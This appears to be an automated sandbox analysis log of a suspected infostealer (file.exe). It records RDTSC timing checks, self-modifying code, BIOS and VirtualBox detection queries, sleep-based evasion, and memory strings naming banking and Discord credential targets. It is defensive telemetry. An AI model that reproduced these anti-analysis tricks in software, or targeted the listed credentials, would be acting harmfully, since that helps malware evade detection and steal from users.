          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5F947 second address: 5F5F985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F6B18E88FEAh 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6B18E88FF3h 0x0000001e jno 00007F6B18E88FE6h 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5F985 second address: 5F5F98E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5F98E second address: 5F5F9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5F9AC second address: 5F5F9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F61E3B second address: 5F61E71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F6B18E88FEBh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ecx 0x00000012 pushad 0x00000013 jp 00007F6B18E88FE6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c pop ecx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push esi 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push esi 0x00000024 pop esi 0x00000025 popad 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F61E71 second address: 5F61E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F61FC9 second address: 5F61FDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F6B18E88FE8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F62067 second address: 5F6206B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6206B second address: 5F62071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F62071 second address: 5F62113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 7EBFDBB1h 0x00000012 push esi 0x00000013 add dword ptr [ebp+122D3978h], eax 0x00000019 pop ecx 0x0000001a push 00000003h 0x0000001c cmc 0x0000001d push 00000000h 0x0000001f xor dx, 048Bh 0x00000024 push 00000003h 0x00000026 mov dword ptr [ebp+122D1CCBh], edx 0x0000002c push BB6A7200h 0x00000031 jmp 00007F6B19184AC2h 0x00000036 xor dword ptr [esp], 7B6A7200h 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007F6B19184AB8h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 sub dword ptr [ebp+124543E3h], esi 0x0000005d lea ebx, dword ptr [ebp+12457D8Ah] 0x00000063 xor dh, FFFFFFA4h 0x00000066 xchg eax, ebx 0x00000067 pushad 0x00000068 push esi 0x00000069 jmp 00007F6B19184ABCh 0x0000006e pop esi 0x0000006f jo 00007F6B19184ABCh 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F62290 second address: 5F62294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F62294 second address: 5F62298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F62298 second address: 5F622A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007F6B18E88FECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F622A9 second address: 5F622BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6B19184AB8h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F622BE second address: 5F622D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F6B18E88FE6h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F622D6 second address: 5F622DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F622DA second address: 5F622E4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B18E88FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F622E4 second address: 5F622E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F622E9 second address: 5F62300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnl 00007F6B18E88FE6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F62300 second address: 5F6232D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push ecx 0x0000000b sub dword ptr [ebp+122D1DCEh], ebx 0x00000011 pop esi 0x00000012 lea ebx, dword ptr [ebp+12457D95h] 0x00000018 push eax 0x00000019 jg 00007F6B19184AC4h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F55841 second address: 5F5584B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6B18E88FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5584B second address: 5F55854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F81B1C second address: 5F81B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F6B18E88FE6h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F6B18E88FF1h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F81C5C second address: 5F81C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6B19184AC1h 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F81C74 second address: 5F81C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F81C90 second address: 5F81C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F82600 second address: 5F82606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F82606 second address: 5F8260A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F82943 second address: 5F8294D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6B18E88FE6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F82C4F second address: 5F82C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6B19184ABBh 0x00000011 popad 0x00000012 jmp 00007F6B19184ABFh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F768C5 second address: 5F768E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FF4h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F768E1 second address: 5F768F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a jng 00007F6B19184AB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5AABA second address: 5F5AACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 je 00007F6B18E88FE6h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5AACE second address: 5F5AAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5AAD4 second address: 5F5AAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8334B second address: 5F833AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F6B19184AB6h 0x00000009 jmp 00007F6B19184AC9h 0x0000000e pop ecx 0x0000000f jmp 00007F6B19184AC4h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F6B19184AD5h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F83653 second address: 5F83659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F83659 second address: 5F83692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC8h 0x00000007 jmp 00007F6B19184AC5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007F6B19184ABCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F83A71 second address: 5F83AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEFh 0x00000007 jnp 00007F6B18E88FE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F6B18E88FF1h 0x00000014 pushad 0x00000015 jmp 00007F6B18E88FECh 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F83AAC second address: 5F83ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F6B19184AB6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8A98A second address: 5F8A9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6B18E88FF9h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 jmp 00007F6B18E88FF1h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6B18E88FEDh 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8EDA8 second address: 5F8EDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edi 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8E4B5 second address: 5F8E4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FEAh 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F6B18E88FE6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8E609 second address: 5F8E60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8E60F second address: 5F8E614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8E614 second address: 5F8E624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6B19184AB6h 0x0000000a jnp 00007F6B19184AB6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8E624 second address: 5F8E628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8E8EC second address: 5F8E909 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B19184AC7h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8E909 second address: 5F8E93A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F6B18E89012h 0x0000000f jmp 00007F6B18E88FEEh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8E93A second address: 5F8E946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6B19184AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8EAAB second address: 5F8EAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F914AB second address: 5F914B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F914B1 second address: 5F914B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F91B8B second address: 5F91B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F91B8F second address: 5F91B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F91B93 second address: 5F91BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F92010 second address: 5F92016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F93324 second address: 5F93328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F93328 second address: 5F9332E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9332E second address: 5F9334B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B19184AC9h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9464E second address: 5F946B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 movzx edi, si 0x00000014 push 00000000h 0x00000016 jng 00007F6B18E88FECh 0x0000001c sub dword ptr [ebp+122D2E66h], esi 0x00000022 mov edi, dword ptr [ebp+122D1CEEh] 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F6B18E88FE8h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 push eax 0x00000045 pushad 0x00000046 jp 00007F6B18E88FECh 0x0000004c jbe 00007F6B18E88FE6h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9514D second address: 5F951D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6B19184AB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c nop 0x0000000d push esi 0x0000000e or si, DB21h 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F6B19184AB8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov edi, 12345FDEh 0x00000035 mov esi, dword ptr [ebp+122D2CAFh] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F6B19184AB8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 mov dword ptr [ebp+1247251Bh], eax 0x0000005d push eax 0x0000005e pushad 0x0000005f jno 00007F6B19184AC1h 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F6B19184AC1h 0x0000006c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F96F95 second address: 5F96F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9B55E second address: 5F9B564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9C607 second address: 5F9C662 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B18E88FE8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push edi 0x0000000f js 00007F6B18E88FE6h 0x00000015 pop edi 0x00000016 pop edi 0x00000017 nop 0x00000018 ja 00007F6B18E88FE9h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F6B18E88FE8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov ebx, edx 0x0000003c push 00000000h 0x0000003e mov ebx, dword ptr [ebp+122D240Dh] 0x00000044 xchg eax, esi 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jnp 00007F6B18E88FE6h 0x0000004e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9C662 second address: 5F9C67F instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B19184AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e jo 00007F6B19184AB6h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F6B19184AB6h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9B7CC second address: 5F9B7DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F6B18E88FE8h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ABE10E instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ABCC77 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 91A5FA instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AE8BEA instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACDFE8 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B50739 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DDDB40 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F87573 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5FAC69E instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F984A0 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 601CF81 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6568Thread sleep time: -36018s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 5640Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 5428Thread sleep time: -36018s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6252Thread sleep time: -34017s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, file.exe, 00000000.00000003.2355867741.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356772744.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2453107458.0000000005F67000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2448950958.0000000000AA0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.0000000005451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: file.exe, 00000000.00000003.2124584562.000000000544B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
